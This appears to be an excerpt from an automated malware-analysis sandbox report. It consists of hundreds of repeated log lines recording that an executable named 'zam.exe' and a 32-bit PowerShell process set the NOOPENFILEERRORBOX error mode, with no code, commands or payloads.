Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
